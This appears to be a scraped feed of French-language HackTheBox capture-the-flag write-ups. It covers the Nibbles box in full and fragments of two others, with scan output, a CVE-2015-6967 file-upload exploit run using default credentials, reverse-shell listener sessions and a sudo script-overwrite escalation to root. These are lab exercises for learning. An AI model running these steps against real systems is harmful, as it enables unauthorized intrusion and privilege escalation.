</span></span><span class="line"><span class="cl">----------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">nc -lnvp <span class="m">6666</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">6666</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.42<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.68<span class="o">]</span> <span class="m">42276</span> </span></span><span class="line"><span class="cl"><span class="c1">## whoami</span> </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"><span class="c1">## cat /root/root.txt</span> </span></span><span class="line"><span class="cl">cat /root/root.txt </span></span><span class="line"><span class="cl">4600.....78e4 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/nibbles-htb/Mon, 13 Jan 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/nibbles-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Nibbles cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Nibbles</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.75</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sS -sC -sV -An -p- -vvv 10.10.10.75 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.18 <span class="o">((</span>Ubuntu<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Site doesn<span class="err">&#39;</span>t have a title <span class="o">(</span>text/html<span class="o">)</span>. </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: OPTIONS GET HEAD POST </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="nibbleblog">nibbleblog </h3><p>Avec gobuster, on trouve aucun dossier interessant sur le serveur web. Par contre, avec burp on trouve une commentaire indiquant l&rsquo;existante d&rsquo;un dossier &ldquo;nibbleblog&rdquo;</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">HTTP/1.1 <span class="m">200</span> OK </span></span><span class="line"><span class="cl">Date: Sun, <span class="m">12</span> Jan <span class="m">2025</span> 23:30:36 GMT </span></span><span class="line"><span class="cl">Server: Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl">Last-Modified: Thu, <span class="m">28</span> Dec <span class="m">2017</span> 20:19:50 GMT </span></span><span class="line"><span class="cl">ETag: <span class="s2">&#34;5d-5616c3cf7fa77-gzip&#34;</span> </span></span><span class="line"><span class="cl">Accept-Ranges: bytes </span></span><span class="line"><span class="cl">Vary: Accept-Encoding </span></span><span class="line"><span class="cl">Content-Length: <span class="m">93</span> </span></span><span class="line"><span class="cl">Keep-Alive: <span class="nv">timeout</span><span class="o">=</span>5, <span class="nv">max</span><span class="o">=</span><span class="m">100</span> </span></span><span class="line"><span class="cl">Connection: Keep-Alive </span></span><span class="line"><span class="cl">Content-Type: text/html </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">&lt;b&gt;Hello world!&lt;/b&gt; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">&lt;!-- /nibbleblog/ directory. Nothing interesting here! --&gt; </span></span></code></pre></td></tr></table> </div> </div><h3 id="adminphp">admin.php </h3><p>En cherchant un peu, on trouve une page de login &ldquo;admin.php&rdquo; avec une page login. Avec les creds trouvés sur internet on a: user: admin password: nibbles</p> <p>On accède au dashboard de nibbles</p> <h3 id="arbitrary-file-upload---user-flag">Arbitrary File Upload - user flag </h3><p>Sur internet, on trouve uen vuln sur nibbleblog :</p> <p>Nibbleblog 4.0.3 - Arbitrary File Upload (CVE-2015-6967)</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">python3 exploit.py --url http://nibbles.htb/nibbleblog/ -u admin -p nibbles -x shell.php </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Login Successful. </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Upload likely successfull. </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Exploit launched, check <span class="k">for</span> shell. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">----------------------------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1337</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.42<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.75<span class="o">]</span> <span class="m">34102</span> </span></span><span class="line"><span class="cl">Linux Nibbles 4.4.0-104-generic <span class="c1">#127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux</span> </span></span><span class="line"><span class="cl"> 04:01:44 up 9:25, <span class="m">0</span> users, load average: 0.00, 0.00, 0.00 </span></span><span class="line"><span class="cl">USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT </span></span><span class="line"><span class="cl"><span class="nv">uid</span><span class="o">=</span>1001<span class="o">(</span>nibbler<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1001<span class="o">(</span>nibbler<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>1001<span class="o">(</span>nibbler<span class="o">)</span> </span></span><span class="line"><span class="cl">/bin/sh: 0: can<span class="err">&#39;</span>t access tty<span class="p">;</span> job control turned off </span></span><span class="line"><span class="cl">$ whoami </span></span><span class="line"><span class="cl">nibbler </span></span><span class="line"><span class="cl">$ env <span class="p">|</span> grep TERM </span></span><span class="line"><span class="cl">$ env </span></span><span class="line"><span class="cl"><span class="nv">APACHE_RUN_DIR</span><span class="o">=</span>/var/run/apache2 </span></span><span class="line"><span class="cl"><span class="nv">APACHE_PID_FILE</span><span class="o">=</span>/var/run/apache2/apache2.pid </span></span><span class="line"><span class="cl"><span class="nv">PATH</span><span class="o">=</span>/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin </span></span><span class="line"><span class="cl"><span class="nv">APACHE_LOCK_DIR</span><span class="o">=</span>/var/lock/apache2 </span></span><span class="line"><span class="cl"><span class="nv">LANG</span><span class="o">=</span>C </span></span><span class="line"><span class="cl"><span class="nv">APACHE_RUN_USER</span><span class="o">=</span>nibbler </span></span><span class="line"><span class="cl"><span class="nv">APACHE_RUN_GROUP</span><span class="o">=</span>nibbler </span></span><span class="line"><span class="cl"><span class="nv">APACHE_LOG_DIR</span><span class="o">=</span>/var/log/apache2 </span></span><span class="line"><span class="cl"><span class="nv">PWD</span><span class="o">=</span>/ </span></span><span class="line"><span class="cl">$ <span class="nb">cd</span> /home </span></span><span class="line"><span class="cl">$ ls </span></span><span class="line"><span class="cl">nibbler </span></span><span class="line"><span class="cl">$ <span class="nb">cd</span> nibbler </span></span><span class="line"><span class="cl">$ ls </span></span><span class="line"><span class="cl">personal.zip </span></span><span class="line"><span class="cl">user.txt </span></span><span class="line"><span class="cl">$ cat user.txt </span></span><span class="line"><span class="cl">962b.....e815 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="personalzip">personal.zip </h3><p>On trouve dans le /home de nibbler un fichier personal.zip avec un fichier vulnerable monitor.sh qui execute une commande en tant que root</p> <h3 id="monitorsh">monitor.sh </h3><p>On peut executer ce fichier en tant que root.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ sudo -l </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> nibbler on Nibbles: </span></span><span class="line"><span class="cl"> env_reset, mail_badpass, </span></span><span class="line"><span class="cl"> <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User nibbler may run the following commands on Nibbles: </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /home/nibbler/personal/stuff/monitor.sh </span></span></code></pre></td></tr></table> </div> </div><p>Il suffit donc de créer un dossier personal/stuff et d&rsquo;y mettre un script monitor.sh avec un <code>cat /root/root.txt</code>. On peut ensuite l&rsquo;executé avec <strong>sudo</strong> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x monitor.sh </span></span><span class="line"><span class="cl">nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh </span></span><span class="line"><span class="cl">4b0a.....a0b8 </span></span></code></pre></td></tr></table> </div> </div><h3 id="root-shell">root shell </h3><p>Pour plus de défi, j&rsquo;ouvre un shell en tant que root. En fait, c&rsquo;était encore plus facile que de faire un cat&hellip;</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ sudo ./monitor.sh </span></span><span class="line"><span class="cl">nibbler@Nibbles:/home/nibbler/personal/stuff# <span class="nb">echo</span> <span class="s2">&#34;/bin/bash&#34;</span> &gt; monitor.sh </span></span><span class="line"><span class="cl">nibbler@Nibbles:/home/nibbler/personal/stuff# sudo ./monitor.sh </span></span><span class="line"><span class="cl">root@Nibbles:/home/nibbler/personal/stuff# whoami </span></span><span class="line"><span class="cl">root </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/shocker-htb/Mon, 13 Jan 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/shocker-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Shocker cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Shocker</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.56</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sS -sC -sV -An -p- -vvv 10.10.10.56 </span></span><span class="line"><span class="cl">Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2025-01-13 05:02 EST </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.18 <span class="o">((</span>Ubuntu<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Site doesn<span class="err">&#39;</span>t have a title <span class="o">(</span>text/html<span class="o">)</span>. </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl">2222/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk </span></span><span class="line"><span class="cl">No exact OS matches <span class="k">for</span> host <span class="o">(</span>If you know what OS is running on it, see https://nmap.org/submit/ <span class="o">)</span>. </span></span></code></pre></td></tr></table> </div> </div><h3 id="dirsearch--gobuster">Dirsearch &amp; gobuster </h3><p>Avec dirsearch, on trouve le dossier <strong>cgi-bin</strong> dont l&rsquo;accès est &ldquo;forbidden&rdquo; mais il existe.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> dirsearch -u http://shocker.htb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> _<span class="p">|</span>. _ _ _ _ _ _<span class="p">|</span>_ v0.4.3 </span></span><span class="line"><span class="cl"> <span class="o">(</span>_<span class="o">||</span><span class="p">|</span> _<span class="o">)</span> <span class="o">(</span>/_<span class="o">(</span>_<span class="o">||</span> <span class="o">(</span>_<span class="p">|</span> <span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Extensions: php, aspx, jsp, html, js <span class="p">|</span> HTTP method: GET <span class="p">|</span> Threads: <span class="m">25</span> <span class="p">|</span> Wordlist size: <span class="m">11460</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Output File: /home/kali/htb/shocker/reports/http_shocker.htb/_25-01-13_07-35-14.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Target: http://shocker.htb/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>07:35:14<span class="o">]</span> Starting: </span></span><span class="line"><span class="cl"><span class="o">[</span>07:35:18<span class="o">]</span> <span class="m">403</span> - 297B - /.ht_wsr.txt </span></span><span class="line"><span class="cl"><span class="o">[</span>07:35:18<span class="o">]</span> <span class="m">403</span> - 300B - /.htaccess.bak1 </span></span><span class="line"><span class="cl"><span class="o">[</span>07:35:18<span class="o">]</span> <span class="m">403</span> - 300B - /.htaccess.orig </span></span><span class="line"><span class="cl"><span class="o">[</span>07:35:18<span class="o">]</span> <span class="m">403</span> - 302B - /.htaccess.sample </span></span><span class="line"><span class="cl"><span class="o">[</span>07:35:18<span class="o">]</span> <span class="m">403</span> - 300B - /.htaccess.save </span></span><span class="line"><span class="cl"><span class="o">[</span>07:35:18<span class="o">]</span> <span class="m">403</span> - 301B - /.htaccess_extra </span></span><span class="line"><span class="cl"><span class="o">[</span>07:35:18<span class="o">]</span> <span class="m">403</span> - 298B - /.htaccess_sc </span></span><span class="line"><span class="cl"><span class="o">[</span>07:35:18<span class="o">]</span> <span class="m">403</span> - 299B - /.htaccessOLD2 </span></span><span class="line"><span class="cl"><span class="o">[</span>07:35:18<span class="o">]</span> <span class="m">403</span> - 298B - /.htaccessBAK </span></span><span class="line"><span class="cl"><span class="o">[</span>07:35:18<span class="o">]</span> <span class="m">403</span> - 300B - /.htaccess_orig </span></span><span class="line"><span class="cl"><span class="o">[</span>07:35:18<span class="o">]</span> <span class="m">403</span> - 290B - /.htm </span></span><span class="line"><span class="cl"><span class="o">[</span>07:35:18<span class="o">]</span> <span class="m">403</span> - 291B - /.html </span></span><span class="line"><span class="cl"><span class="o">[</span>07:35:18<span class="o">]</span> <span class="m">403</span> - 298B - /.htaccessOLD </span></span><span class="line"><span class="cl"><span class="o">[</span>07:35:18<span class="o">]</span> <span class="m">403</span> - 296B - /.htpasswds </span></span><span class="line"><span class="cl"><span class="o">[</span>07:35:18<span class="o">]</span> <span class="m">403</span> - 300B - /.htpasswd_test </span></span><span class="line"><span class="cl"><span class="o">[</span>07:35:18<span class="o">]</span> <span class="m">403</span> - 297B - /.httr-oauth </span></span><span class="line"><span class="cl"><span class="o">[</span>07:35:33<span class="o">]</span> <span class="m">403</span> - 294B - /cgi-bin/ </span></span><span class="line"><span class="cl"><span class="o">[</span>07:35:56<span class="o">]</span> <span class="m">403</span> - 299B - /server-status </span></span><span class="line"><span class="cl"><span class="o">[</span>07:35:57<span class="o">]</span> <span class="m">403</span> - 300B - /server-status/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Task Completed </span></span></code></pre></td></tr></table> </div> </div><p>On peut essayer de trouver des fichiers à l&rsquo;intérieur avec gobuster et l&rsquo;extension -x, qui permet de tester toute la liste avec les extensions précisées. Ici, on teste les fichiers dans le dossier cgi-bin avec les extensions &ldquo;sh&rdquo;, &ldquo;bin&rdquo;, et &ldquo;cgi&rdquo;.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ gobuster dir -u http://shocker.htb/cgi-bin -t <span class="m">50</span> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x sh,pl,bin,cgi </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Gobuster v3.6 </span></span><span class="line"><span class="cl">by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> <span class="p">&amp;</span> Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Url: http://shocker.htb/cgi-bin </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Method: GET </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Threads: <span class="m">50</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Negative Status codes: <span class="m">404</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> User Agent: gobuster/3.6 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Extensions: sh,bin,cgi </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Timeout: <span class="nv">10s</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Starting gobuster in directory enumeration <span class="nv">mode</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">/user.sh <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 118<span class="o">]</span> </span></span><span class="line"><span class="cl">Progress: <span class="m">10557</span> / <span class="m">882244</span> <span class="o">(</span>1.20%<span class="o">)</span>^C </span></span><span class="line"><span 